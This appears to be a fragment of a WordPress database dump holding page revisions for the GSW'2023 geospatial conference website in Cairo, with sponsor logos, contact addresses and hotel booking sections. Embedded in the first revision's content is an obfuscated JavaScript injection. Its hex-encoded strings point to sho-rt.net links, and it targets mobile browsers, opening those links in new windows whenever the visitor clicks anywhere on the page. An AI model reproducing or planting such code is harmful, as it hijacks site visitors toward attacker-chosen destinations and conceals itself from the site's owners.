vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-24 00:00:12','2023-06-24 00:00:12','',3066,'https://gsw2023.com/?p=4767',0,'revision','',0),
(4768,1,'2023-06-24 00:04:29','2023-06-24 00:04:29','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button 